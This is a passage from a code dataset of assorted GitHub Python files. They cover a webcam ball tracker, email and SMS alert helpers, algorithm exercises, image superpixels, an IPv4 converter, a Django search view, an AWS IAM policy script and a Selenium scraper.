+ (3 * header_size) - 1) + ctbl[enc]['mr']\n output_table_str += self._str_print(row_sep)\n return output_table_str\n except IOError as e:\n if e.errno == errno.EPIPE:\n return\n else:\n raise e\n\n def color_cell(self, text, color):\n return (color, text) if self.colors else text\n","repo_name":"LINBIT/linstor-client","sub_path":"linstor_client/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":15172,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"41010891939","text":"import asyncio\nimport datetime\nimport random\nimport websockets\nimport cv2\nimport numpy as np\n\nkernel = np.ones((5,5),np.uint8)\n\n# Take input from webcam\ncap = cv2.VideoCapture(0)\nprint(str(cap.get(3))+' x '+str(cap.get(4)))\n\nhmn = 11\nhmx = 135\n\nsmn = 18\nsmx = 66\n\nvmn = 56\nvmx = 110\n\nasync def time(websocket, path):\n print('connected')\n while True:\n is_sucessfully_read, frame = cap.read()\n \n cv2.flip(frame,1)\n \n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n hue,sat,val = cv2.split(hsv)\n \n # Apply thresholding\n hthresh = cv2.inRange(np.array(hue),np.array(hmn),np.array(hmx))\n 
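# each cv2.inRange call builds a binary mask for one HSV channel; the three masks are combined below with cv2.bitwise_and\n        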
sthresh = cv2.inRange(np.array(sat),np.array(smn),np.array(smx))\n vthresh = cv2.inRange(np.array(val),np.array(vmn),np.array(vmx))\n\n # AND h s and v\n tracking = cv2.bitwise_and(hthresh,cv2.bitwise_and(sthresh,vthresh))\n\n # Some morpholigical filtering\n dilation = cv2.dilate(tracking,kernel,iterations = 1)\n closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel)\n closing = cv2.GaussianBlur(closing,(5,5),0)\n\n # Detect circles using HoughCircles 100/50\n circles = cv2.HoughCircles(closing,cv2.HOUGH_GRADIENT,2,120,param1=70,param2=40,minRadius=5,maxRadius=10)\n\n x = 0\n y = 0\n \n #Draw Circles\n if circles is not None:\n for i in circles[0,:]:\n x = int(round(i[0]))\n y = int(round(i[1]))\n cv2.circle(frame,(int(round(i[0])),int(round(i[1]))),int(round(i[2])),(0,255,0),1)\n cv2.circle(frame,(int(round(i[0])),int(round(i[1]))),2,(0,255,0),5)\n \n if(x>0 and y>0):\n #print('x: '+str(x))\n #print('y: '+str(y))\n await websocket.send(str(x)+';'+str(y))\n \n #await asyncio.sleep(0.1)\n\t\t\t\t\nstart_server = websockets.serve(time, '10.0.1.44', 5678)\nprint('websocket started...')\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n","repo_name":"otakuu/pingPongTracker","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1678411337","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE\nfrom email import encoders\nimport datetime\nfrom typing import List\nfrom twilio.rest import Client\n\n\ndef send_text(account_sid: str, auth_token: str, from_number: str, to_number: str, text_body: str) -> None:\n \"\"\"account_sid : account id of twilio account. see the READ.MD on how you can get it \nauth_token : authorization token for twilio services see the READ.MD on how you can get it \nfrom_number : the number you will use to send the text. This should be provided by Twilio. Read the READ.MD for how you should get it \nto_number : list of the numbers that will get the text \nex) '+142444444444'\ntext_body : content of the text \"\"\"\n # Set up the credentials \n account_sid = account_sid\n auth_token = auth_token\n client = Client(account_sid, auth_token)\n\n # Send the message \n message = client.messages.create(\n from_=from_number,\n body=text_body,\n to=to_number\n )\n\n print(f\"message sent. message sid : {message.sid}\")\n\n\ndef send_email(sender_email: str, sender_password: str, to_email: str, smtp_server: str = None, smtp_port: str = None, file_loc: str = None, mail_body: str = 'this is message generated from send_alert module', mail_subject: str = f\"{datetime.datetime.now()} alert sent by send_alert module\") -> bool:\n \"\"\"\n sender_email : email you will use to send the alert\\n\n sender_password : password for the email you will use to send the alert\\n\n to_email : list of emails that will get the alert\\n\n ex) 'test2@gmail.com'\\n\n smtp_server : smtp server for your sender email. If we have the smtp server of your email provider in our db, you might not need to input it \n ex) gmail.com -> smtp.gmail.com\n smtp_port : smtp server for your sender email. 
If we have the smtp port of your email provider in our db, you might not need to input it \n ex) gmail.com -> 587 \n file_loc : full directory of the attachement file (default : None)\\n\n mail_body : the content of the mail\\n\n mail_subject : the subject of the mail \\n\n \"\"\"\n\n # list of email providers\n email_provider_dict = {\n \"gmail\": {\n \"smtp_server\": \"smtp.gmail.com\",\n \"smtp_port\": 587\n },\n \"yahoo\": {\n \"smtp_server\": \"smtp.mail.yahoo.com\",\n \"smtp_port\": 465\n },\n \"outlook\": {\n \"smtp_server\": \"smtp.office365.com\",\n \"smtp_port\": 587\n },\n \"aol\": {\n \"smtp_server\": \"smtp.aol.com\",\n \"smtp_port\": 587\n },\n \"protonmail\": {\n \"smtp_server\": \"smtp.protonmail.com\",\n \"smtp_port\": 587\n },\n \"naver\": {\n \"smtp_server\": \"smtp.naver.com\",\n \"smtp_port\": 587\n },\n \"zoho\": {\n \"smtp_server\": \"smtp.zoho.com\",\n \"port\": 587\n }\n }\n # Email credentials\n sender_email = sender_email\n # If smtp_server or smtp_port is not provided\n if smtp_server is None or smtp_port is None:\n email_provider = sender_email.split('@')[1].split('.')[0].lower()\n try:\n smtp_server = email_provider_dict[email_provider][\"smtp_server\"]\n smtp_port = email_provider_dict[email_provider][\"smtp_port\"]\n except Exception as e:\n print(\"smtp_server and smtp_port was not found in our database. Please provide the server (eg. smtp.gmail.com) and the port (eg. 465)\")\n print(e)\n sender_password = sender_password\n\n # Recipient email\n to = to_email\n\n # Create a multipart message\n msg = MIMEMultipart()\n msg['From'] = sender_email\n msg['To'] = COMMASPACE.join([to])\n msg['Subject'] = mail_subject\n\n # Add message body\n body = mail_body\n msg.attach(MIMEText(body))\n\n if file_loc:\n # Add attachment\n filename = file_loc\n attachment = open(filename, 'rb')\n part = MIMEBase('application', 'octet-stream')\n part.set_payload((attachment).read())\n encoders.encode_base64(part)\n part.add_header('Content-Disposition',\n \"attachment; filename= %s\" % filename)\n msg.attach(part)\n\n # Send the email\n try:\n smtpObj = smtplib.SMTP(smtp_server, smtp_port)\n smtpObj.starttls()\n smtpObj.login(sender_email, sender_password)\n smtpObj.sendmail(sender_email, to, msg.as_string())\n smtpObj.quit()\n print(f\"Email to {to} sent successfully\")\n return True\n except Exception as e:\n print(\"Error: unable to send email\", e)\n return False\n","repo_name":"dougieduk/dougs_noti","sub_path":"dougs_noti/noti.py","file_name":"noti.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10737984400","text":"\"\"\"\nhttps://www.geeksforgeeks.org/count-of-subsets-with-given-difference/\n\nGiven an array arr[] of size N and a given difference diff, the task is to count the number of partitions that we can\n perform such that the difference between the sum of the two subsets is equal to the given difference.\n\nNote: A partition in the array means dividing an array into two parts say S1 and S2 such that the union of S1 and S2\nis equal to the original array and each element is present in only of the subsets.\n\"\"\"\n\nfrom typing import List, Dict, Tuple\n\n\"\"\" My solution \"\"\"\n\n\ndef get_number_subsets(nums: List[int], diff: int) -> int:\n \"\"\"\n :param nums: elements available to be partitioned\n :param diff: desired difference between two partitions\n :return: ways to partition nums in two parts so that the difference between them is \"diff\"\n\n Idea: 
let K(n, diff) the way to subset the first (n + 1) items so that S_1 - S_2 = diff\n Recursion: K(n + 1, diff) = K(n, diff + a[n + 1]) + K(n, diff - a[n + 1])\n Initialize: K(-1, 0) = 1, for any i != 0, K(-1, i) = 0\n In the first case, add a[n + 1] to S_2 and get diff. In the second case, add a[n + 1] so S_1 and get diff.\n \"\"\"\n n = len(nums)\n # memorization[(i, j)] is K(i, j), i.e. ways to solve problem with (i + 1) first objects and j desired diff\n memoization = dict()\n return _number_subsets(n=n - 1, diff=diff, memoization=memoization, nums=nums)\n\n\ndef _number_subsets(n: int, diff: int, memoization: Dict[Tuple[int, int], int], nums: List[int]) -> int:\n \"\"\"\n Define recursion\n :param n: number of items at disposal minus 1 (index of last item available)\n :param diff: target difference\n :return: number of items\n \"\"\"\n if (n, diff) in memoization:\n return memoization[n, diff]\n # no item at all. Note: important to initialize with empty set rather than 1st item -- will be different if\n # there is a zero\n if n == -1:\n if diff == 0:\n return 1 # with no item at all, we can only make an empty set, which sums to zero\n else:\n return 0\n else:\n res = _number_subsets(n=n - 1, diff=diff + nums[n], memoization=memoization, nums=nums) \\\n + _number_subsets(n=n - 1, diff=diff - nums[n], memoization=memoization, nums=nums)\n memoization[n, diff] = res\n return res\n\n\ndef main():\n nums = [0, 1]\n assert get_number_subsets(nums=nums, diff=1) == 2\n nums = [1, 2, 3, 1, 2]\n assert get_number_subsets(nums=nums, diff=1) == 5\n nums = [5, 2, 6, 4]\n assert get_number_subsets(nums=nums, diff=3) == 1\n nums = [0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert get_number_subsets(nums=nums, diff=1) == 256\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"GabCaz/quant-algorithms","sub_path":"dynamic-programming/count_of_subsets_with_given_difference.py","file_name":"count_of_subsets_with_given_difference.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27949879454","text":"import time\n\n# Set the number of seconds to count down from\nseconds = 10\n\n# Loop through the countdown and print each second\nfor i in range(seconds, 0, -1):\n print(i)\n time.sleep(1)\n\n# Print \"Time's up!\" when the countdown is done\nprint(\"Time's up!\")\n\n\n","repo_name":"GchatCodes/Timer","sub_path":"таймер/таймер.py","file_name":"таймер.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71186206013","text":"import cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nstr_to_algorithm = {\n 'SLIC': cv.ximgproc.SLIC,\n 'SLICO': cv.ximgproc.SLICO,\n 'MSLIC': cv.ximgproc.MSLIC\n}\n\nclass SuperpixelsEx():\n\n def __init__(self, algorithm='SLIC'):\n \n self.algorithm = str_to_algorithm[algorithm]\n\n def __str__(self):\n return 'superpixels'\n\n def describeImage(self,img):\n\n img = cv.GaussianBlur(img, (3, 3), 0)\n # instance and run SLIC\n slic = cv.ximgproc.createSuperpixelSLIC(img, self.algorithm, 100)\n slic.iterate(10)\n\n # get and draw superpixels\n mask = slic.getLabelContourMask()\n \n img_superpixeled = img.copy()\n img_superpixeled[mask != 0] = (0, 255, 255)\n\n # replace original image pixels with superpixels means\n labels = slic.getLabels()\n\n img_clustered = np.zeros_like(img)\n\n num_superpixels = slic.getNumberOfSuperpixels()\n print(num_superpixels)\n for k in 
range(num_superpixels):\n class_mask = (labels == k).astype(\"uint8\")\n mean_color = cv.mean(img, class_mask)\n img_clustered[class_mask != 0, :] = mean_color[:3]\n\n return img_clustered, img_superpixeled, labels, num_superpixels\n\n\n def extract_features(self, img):\n pass\n\nif __name__ == '__main__':\n image = cv.imread('.\\examples\\SOB_B_A-14-22549AB-40-019.png', cv.IMREAD_COLOR)\n image = cv.cvtColor(image, cv.COLOR_BGR2Lab)\n my_superpixels = SuperpixelsEx()\n img_clustered, img_superpixeled, labels, num_superpixels = my_superpixels.describeImage(image)\n print(np.unique(labels), num_superpixels) \n plt.imshow(labels)\n plt.show()\n cv.imwrite(\"C:/Users/hadil/Documents/projects/Machine Learning/project/breast/benign/SOB/adenosis/SOB_B_A_14-22549AB/40X/SOB_B_A-14-22549AB-40-001.png\", labels)\n all_features = []\n for k in range(num_superpixels):\n class_mask = (labels == k).astype(\"uint8\")\n ma_sk = (labels == k).astype(np.uint8)\n img_clustered = cv.bitwise_and(img_superpixeled, img_superpixeled, mask=ma_sk)\n features = my_superpixels.extract_features(img_clustered)\n all_features.append(features)\n\n\n all_features = np.array(all_features)\n print(all_features.shape)\n\n #Just for testing:\n #np.savetxt('all_features.csv', all_features, delimiter=',')","repo_name":"yusuftengriverdi/breakhis-classification","sub_path":"features/extractors/superpixels.py","file_name":"superpixels.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9134171360","text":"from collections import deque\n\npeople = deque()\n\nn, k = map(int, input().split())\n\nfor i in range(1, n+1):\n people.append(i)\n\nanswer = []\n\nwhile people:\n for i in range(k-1):\n people.append(people.popleft())\n answer.append(people.popleft())\n\nprint(str(answer).replace('[', '<').replace(']', '>'))","repo_name":"LEEJaeHyeok97/PYTHON_algorithm","sub_path":"알고리즘기초1/요세푸스.py","file_name":"요세푸스.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5101312731","text":"import re\n\ndef biToDe(biStr):\n ans=0\n for bit in biStr:\n ans=ans*2+int(bit)\n return ans\n\ndef deToBi(deStr):\n ans = \"\"\n currValue = 128\n deInt = int(deStr)\n for i in range(0,8):\n if(deInt>=currValue):\n ans+=\"1\"\n deInt-=currValue\n else:\n ans+=\"0\"\n currValue /= 2\n return ans\n\n\ndef biAddressToDeAddess(biAddress):\n ans = \"\"\n biAddressParts = re.findall(\"[0-9]+\", biAddress)\n for biAddressPart in biAddressParts:\n ans+=str(biToDe(biAddressPart))+\".\"\n ans = ans[0:-1]\n return ans\n\ndef deAddressToBiAddess(biAddress):\n ans = \"\"\n deAddressParts = re.findall(\"[0-9]+\", biAddress)\n for deAddressPart in deAddressParts:\n ans+=str(deToBi(deAddressPart))+\".\"\n ans = ans[0:-1]\n return ans\n\ndef announce(biAddress, text):\n print(\"*********\")\n print(text, biAddress)\n print(text, biAddressToDeAddess(biAddress))\n print(\"*********\")\n print()\n\ndef networkAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit>networkPart):\n ans+=\"0\"\n else:\n ans+=bit\n else:\n ans+=bit\n announce(ans, \"Network Address\")\n\ndef broadcastAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit>networkPart):\n ans+=\"1\"\n else:\n ans+=bit\n else:\n ans+=bit\n announce(ans, \"Broadcast 
Address\")\n\ndef subnetMaskAddress(biAddress, networkPart):\n currBit = 0\n ans = \"\"\n for bit in biAddress:\n if(bit!=\".\"):\n currBit+=1\n if(currBit<=networkPart):\n ans+=\"1\"\n else:\n ans+=\"0\"\n else:\n ans+=bit\n announce(ans, \"Subnet mask Address\")\n\ndef __main__():\n IPv4 = input(\"Input IPv4 Address (In any format is okay):\");\n #IPv4 = \"128.226.170.3\"\n networkPart = -1;\n #Calculate Network Part\n if(\"/\" in IPv4):\n ipAddress = re.findall(\"(.*)/\", IPv4)[0]\n networkPart = int(re.findall(\"/(.*)\", IPv4)[0])\n else:\n ipAddress = IPv4\n #Convert Ip Address to both Bi and De\n if(len(ipAddress)>32):\n ipAddressBi = ipAddress\n else:\n ipAddressBi = deAddressToBiAddess(ipAddress)\n announce(ipAddressBi, \"IPv4 Address\")\n if(networkPart>=0):\n networkAddress(ipAddressBi, networkPart)\n broadcastAddress(ipAddressBi, networkPart)\n subnetMaskAddress(ipAddressBi, networkPart)\n \n\n__main__()","repo_name":"danganhvu1998/myINIAD","sub_path":"code/PythonINIAD/IPv4Converter.py","file_name":"IPv4Converter.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71720029692","text":"from django.shortcuts import render\n#main function\nfrom . import helpers\n\n\ndef index(request):\n collection = helpers.connect()\n var = request.GET.get('search')\n data = str(var)\n result = helpers.CheckPalindrome(data)\n\n if var:\n if helpers.isNum(var) == True:\n product_list = list(collection.find({\"id\": int(var)}).limit(1))\n if result == True:\n helpers.discount_promotion(product_list)\n context = {\n 'product_list': product_list, 'palindrome': result\n }\n return render(request, 'walmart/index.html', context)\n\n else:\n data = data.lower()\n regex_query = [{\"brand\": {\"$regex\": data}},{\"description\": {\"$regex\": data}}]\n product_list = list(collection.find({'$or': regex_query}))\n\n if result == True and len(data) > 3:\n helpers.discount_promotion(product_list)\n context = {\n 'product_list': product_list, 'palindrome': result\n }\n return render(request, 'walmart/index.html', context)\n\n\n\n context = {\n 'product_list':'', 'palindrome': ''\n }\n return render(request, 'walmart/index.html', context)\n","repo_name":"xperro/desafio_walmart","sub_path":"desafio/walmart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27681492841","text":"from django.apps import apps as django_apps\nfrom edc_model_wrapper import ModelWrapper\nfrom edc_lab.models import BoxItem, ManifestItem\n\nfrom ..dashboard_urls import dashboard_urls\n\nedc_lab_app_config = django_apps.get_app_config('edc_lab')\n\n\nclass AliquotModelWrapper(ModelWrapper):\n\n model = edc_lab_app_config.aliquot_model\n next_url_name = dashboard_urls.get('aliquot_listboard_url')\n\n @property\n def human_readable_identifier(self):\n return self.object.human_readable_identifier\n\n @property\n def box_item(self):\n try:\n return BoxItem.objects.get(identifier=self.aliquot_identifier)\n except BoxItem.DoesNotExist:\n return None\n\n @property\n def manifest_item(self):\n manifest_item = None\n if self.box_item:\n try:\n manifest_item = ManifestItem.objects.get(\n identifier=self.box_item.box.box_identifier)\n except ManifestItem.DoesNotExist:\n pass\n return 
manifest_item\n","repo_name":"botswana-harvard/edc-lab-dashboard","sub_path":"edc_lab_dashboard/model_wrappers/aliquot_model_wrapper.py","file_name":"aliquot_model_wrapper.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17238404305","text":"from grammar import SimpleGrammar\n\nsg = SimpleGrammar()\nsg.add_tag(\"story\", [\"#story_beginning# #story_problem# #story_climax# #story_ending#\"])\nsg.add_tag(\"story_beginning\", [\"Once upon a time there was a valiant #animal#\"])\nsg.add_tag(\"story_problem\", [\"that never #difficulty_verb#.\", \\\n \"that one day heard some strange words: #strange_calling#\"])\nsg.add_tag(\"story_climax\", [\"Suddenly, he decided to #resolution_verb#.\"])\nsg.add_tag(\"story_ending\", [\"Finally he could #result_verb# without worries.\"])\nsg.add_tag(\"difficulty_verb\", [\"slept\", \"danced\", \"talked\"])\nsg.add_tag(\"resolution_verb\", [\"run\", \"sing\", \"give up\"])\nsg.add_tag(\"result_verb\", [\"sleep\", \"dance\", \"talk freely\"])\nsg.add_tag(\"strange_calling\", [\"Hello #name#!\", \"Hello my #writer_object#!\"])\nsg.add_tag(\"animal\", [\"dolphin\", \"dog\", \"cat\", \"lamb\", \"lion\"])\nsg.add_tag(\"name\", [\"Mr. Gil\", \"Madame\", \"Masked Man\"])\nsg.add_tag(\"writer_object\", [\"text\", \"book\", \"beloved code\"])\n\nprint(sg.evaluate(\"#story#\"))","repo_name":"adrianogil/nanogenmo17","sub_path":"src/grammar_test.py","file_name":"grammar_test.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22387257985","text":"import boto3\nimport json\nimport os\nimport logging\nimport requests\nimport getpass\nfrom botocore.exceptions import SSOTokenLoadError\nfrom botocore.exceptions import UnauthorizedSSOTokenError\nfrom configparser import ConfigParser\n\n\ndef awscliv2_exists():\n \"Return True if AWSCLIv2 is installed\"\n return os.path.exists(\n os.path.dirname(\"C:/Program Files/Amazon/AWSCLIV2\")\n )\n\n\ndef check_path(file_path):\n if not os.path.exists(os.path.dirname(file_path)):\n try:\n os.makedirs(os.path.dirname(file_path))\n return file_path\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef write_file(file_path, file_contents):\n with open(file_path, \"w\") as file_output:\n file_output.write(file_contents)\n\n\ndef append_profiles(filepath, account_id, account_name, filetype=\"config\"):\n \"Append/Overwrite ct_audit and legacy_audit profiles to aws config file\"\n delimiter()\n print(\"Adding profile to your aws config file\")\n config = ConfigParser()\n config.read(filepath)\n if filetype.lower() == \"config\":\n profile = \"profile \"\n if filetype.lower() == \"credentials\":\n profile = \"\"\n if org_flag == \"ct\":\n config[f\"{profile}{account_name}\"] = dict(\n sso_start_url = \"https://globeaws.awsapps.com/start\",\n sso_region = region,\n sso_account_id = account_id,\n sso_role_name = \"AWSAdministratorAccess\",\n region = region,\n ca_bundle = \"C:\\\\Program Files\\\\Amazon\\AWSCLIV2\\\\nskp_config\\\\netskope-cert-bundle.pem\",\n output = \"json\",\n )\n elif org_flag == \"leg\":\n config[f\"{profile}{account_name}\"] = dict(\n source_profile = \"master\",\n role_arn = f'arn:aws:iam::{account_id}:role/OrganizationAccountAccessRole',\n region = region,\n ca_bundle = \"C:\\\\Program Files\\\\Amazon\\AWSCLIV2\\\\nskp_config\\\\netskope-cert-bundle.pem\",\n output = \"json\",\n )\n with 
open(filepath, \"w\") as configfile:\n config.write(configfile)\n delimiter()\n print(f\"Added profile {profile}{account_name} to your aws config file\")\n\n\ndef test_token(session):\n client = session.client('sts')\n try:\n client.get_caller_identity()\n except (UnauthorizedSSOTokenError, SSOTokenLoadError) as e:\n if \"expired or is otherwise invalid\" in str(e):\n delimiter()\n logger.info(e)\n logger.info(\"Reinitiating SSO Login...\")\n os.system(f\"aws sso login --profile {session.profile_name}\")\n return \n\n\ndef client_config(creds,service,region='us-west-2'):\n response = session.client(\n aws_access_key_id = creds['AccessKeyId'],\n aws_secret_access_key = creds['SecretAccessKey'],\n aws_session_token = creds['SessionToken'],\n region_name = region,\n service_name = service\n )\n return response\n\n\ndef delimiter(symbol='='):\n logger.info(symbol * 120)\n\n\ndef get_resource(identifier:str):\n client = session.client('kms') \n if \"nil_\" in identifier:\n print(\"nil_ to nil-\")\n identifier = identifier.replace('nil_','nil-')\n elif \"nilpmfmast\" in identifier:\n print(\"nilpmfmast to nil-pmfmast\")\n identifier = identifier.replace('nilpmfmast','nil-pmfmast')\n print(identifier)\n try:\n return client.describe_key(\n KeyId=f\"alias/{identifier}\"\n )['KeyMetadata']\n except client.exceptions.NotFoundException:\n print(\"KMS Key not found using the provided alias,\"\n \" granting access to Key based on alias.\")\n return {'Arn':f\"arn:aws:kms:us-west-2:896172592430:alias/*{identifier[-7:]}\"}\n\ndef get_bucket_name(env:str):\n if env == \"dev\":\n return 'tmk-cdm-data'\n elif env in [\"test\",\"tst\"]:\n return 'tmk-cdm-test-data'\n elif env in [\"prod\",\"prd\"]:\n return 'tmk-cdm-prd-data'\n else:\n print(\"environment not detected\")\n return None\n\n\ndef attach_policy(user_name,policy):\n try:\n user_pol = iam.get_user_policy(\n UserName=user_name,\n PolicyName=f\"Informatica_CmnUtilKey_Access\"\n )\n result = True\n except iam.exceptions.NoSuchEntityException:\n result = False\n if result:\n print(f\"Policy already present on {user_name}\")\n else:\n print(f\"!!!Adding Policy to {user_name}!!!\")\n iam.put_user_policy(\n UserName=user_name,\n PolicyName=f\"Informatica_CmnUtilKey_Access\",\n PolicyDocument=policy\n )\n\n\ndef create_policy():\n return {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"KMSAccess\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\": get_resource(f\"CmnUtilKeyAlias\")['Arn']\n } \n ]\n }\n\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nuserprofile = os.environ[\"USERPROFILE\"]\naws = \"/.aws/\"\naws_config_file = f\"{userprofile}{aws}config\"\n\naccount_id_dict = {\n 'dev': '896172592430',\n 'tst': '856695471500',\n 'prd': '838001389413'\n}\nenvironment_id = input(\"Enter environment: \").upper()\ntarget_account_id = account_id_dict[environment_id.lower()]\ntarget_account_name = f\"cdm_{environment_id.lower()}\"\norg_flag = input(\"Is this in the CT or Legacy Org? 
(CT or Leg) \")\norg_flag = org_flag.lower()\nregion = \"us-west-2\"\nif awscliv2_exists:\n append_profiles(aws_config_file,target_account_id,target_account_name)\nsession = boto3.session.Session(\n profile_name=target_account_name,\n region_name=region\n)\nsts = session.client(\"sts\")\ntest_token(session)\niam = session.client('iam')\nsm = session.client('secretsmanager')\n\nusers = [user for user in iam.list_users()['Users'] if f\"Informatica_{environment_id}\" in user['UserName']]\npolicy = json.dumps(create_policy())\nprint(users)\nfor user in users:\n attach_policy(user['UserName'],policy)","repo_name":"SGWalls/Walls-AWS","sub_path":"aws_IAMTasks/add_policy_CDM_InformaticaUsers.py","file_name":"add_policy_CDM_InformaticaUsers.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1147663646","text":"from mealplanner.domain.direction_repository import DirectionRepository\nfrom mealplanner.domain.direction import Direction\nimport unittest\n\n\nclass TestDirectionRepository(unittest.TestCase):\n\n def setUp(self):\n self.test_repo = DirectionRepository('test.db')\n\n def tearDown(self):\n self.test_repo.drop_db()\n\n def test_save_direction__should_save_both_directions__when_two_provided(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"test_direction_2\", 1, 2))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(2, len(actual))\n\n def test_save_direction__should_not_save_direction_again__when_it_already_exists(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 2, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(1, len(actual))\n\n def test_save_direction__should_not_save_direction_again__when_it_already_exists_in_different_case(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"TEST_DIRECTION_1\", 1, 1, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(1, len(actual))\n\n def test_save_direction__should_save_direction__when_none_exist(self):\n # Arrange\n name = \"test_direction_1\"\n self.test_repo.save_direction(Direction(name, 1, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()[0].direction\n\n # Assert\n self.assertEqual(name, actual)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mnilson/meal_planner","sub_path":"tests/test_direction_repository.py","file_name":"test_direction_repository.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73912682173","text":"import argparse\nimport torch\nimport functools\n\n\ndef parse_al_args():\n parser = argparse.ArgumentParser(\"common parameters for active learning\")\n parser.add_argument(\"--MODEL_NAME\", default=\"facebook/contriever\")\n parser.add_argument(\"--DATA_NAME\", help=\"DATA_NAME is required. Try msmarco or nq\")\n parser.add_argument(\n \"--RESULTS_DIR\", help=\"RESULTS_DIR is required. 
e.g.: msmarco_new_human\"\n )\n parser.add_argument(\n \"--path_to_ranking_profile_bm25\",\n default=\"\",\n help=(\n \"path_to_ranking_profile_bm25 is required,\"\n \" which can be obtained by BM25 with k1=0.9 and b=0.4.\"\n ),\n )\n parser.add_argument(\"--STEP\", help=\"STEP is required, starting with 0\")\n parser.add_argument(\"--N_REPEATS\", default=3, type=int)\n parser.add_argument(\"--REPEAT_SEED\", default=42, type=int)\n parser.add_argument(\n \"--path_to_splits\",\n default=\"\",\n help=\"find qids_split by train_data.pt or train_data_human_response.pt\",\n )\n parser.add_argument(\"--number_of_qid_split_batch\", default=4, type=int)\n parser.add_argument(\"--NUM_EPOCHS\", default=10, type=int)\n parser.add_argument(\"--DRYRUN\", default=0, type=int)\n\n args = parser.parse_args()\n print(args)\n\n try:\n STEP = int(args.STEP)\n except ValueError:\n STEP = args.STEP\n\n qids_split = []\n if len(args.path_to_splits):\n for i in range(args.number_of_qid_split_batch):\n training_data = torch.load(\n f\"{args.path_to_splits}/data_iteration_{i}/training_data.pt\"\n )\n qids_split.append(\n list(\n set(training_data.keys())\n - set(functools.reduce(list.__add__, qids_split, []))\n )\n )\n qids_split = [[str(x) for x in s] for s in qids_split]\n\n if len(args.path_to_ranking_profile_bm25):\n ranking_profile_bm25 = torch.load(args.path_to_ranking_profile_bm25)\n else:\n ranking_profile_bm25 = None\n\n return (\n args.MODEL_NAME,\n args.DATA_NAME,\n args.RESULTS_DIR,\n STEP,\n ranking_profile_bm25,\n qids_split,\n args.N_REPEATS,\n args.REPEAT_SEED,\n args.number_of_qid_split_batch,\n args.NUM_EPOCHS,\n args.DRYRUN,\n )\n","repo_name":"awslabs/crowd-coachable-recommendations","sub_path":"scripts/al_commons.py","file_name":"al_commons.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"31241804614","text":"import schedule\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nstart_urls = [\n \"https://www.accuweather.com/es/ec/guayaquil/127947/weather-forecast/127947\",\n \"https://www.accuweather.com/es/ec/quito/129846/weather-forecast/129846\",\n 